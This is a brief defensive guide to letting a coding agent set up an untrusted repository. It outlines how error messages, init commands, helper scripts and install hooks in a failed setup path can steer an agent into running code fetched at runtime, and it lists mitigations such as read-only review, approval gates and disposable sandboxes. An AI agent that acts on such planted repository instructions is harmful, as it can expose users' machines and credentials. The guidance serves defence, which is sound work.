A clean-looking repository is not automatically safe for a coding agent. The risky moment is often not the first command, but the recovery path after setup fails and the agent tries to fix it.
Start Read-only
Ask the agent to map setup files, package scripts, install hooks, shell scripts, CI files, and documentation commands before executing anything. Treat the first pass as source review, not bootstrap.
Review The Failure Path
Error messages, init commands, helper scripts, and package lifecycle hooks can become instructions. Inspect what the agent would run after a failed setup command and whether that path fetches code or configuration at runtime.
- Which command does the error recommend?
- Which scripts or package hooks does that command invoke?
- Can any runtime-fetched content change without a Git commit?
Keep Shell And Network Narrow
Use read-only or plan-style exploration before setup. Avoid broad permission bypass outside containers or VMs, and require approval for package managers, shell wrappers, network fetches, and credential-touching commands.
Run Once In Isolation
Use a disposable container, VM, sandbox, or throwaway worktree with no production credentials, browser profile, SSH agent forwarding, or mounted home directory. Capture the transcript, diff, package scripts, and network destinations.
Promote Only When Boring
A setup path is ready for team reuse only when the commands are fixed, the network calls are known, the scripts are reviewed, and the rollback path is clear. If the agent needed unreviewed fixes, keep the repo isolated.
Sources
- Anthropic·Official doc·Core sourceClaude Code security documentation
- Anthropic·Official doc·Core sourceClaude Code permissions documentation
- 0DIN·Third-party·Community observation0DIN: Clone This Repo and I Own Your Machine
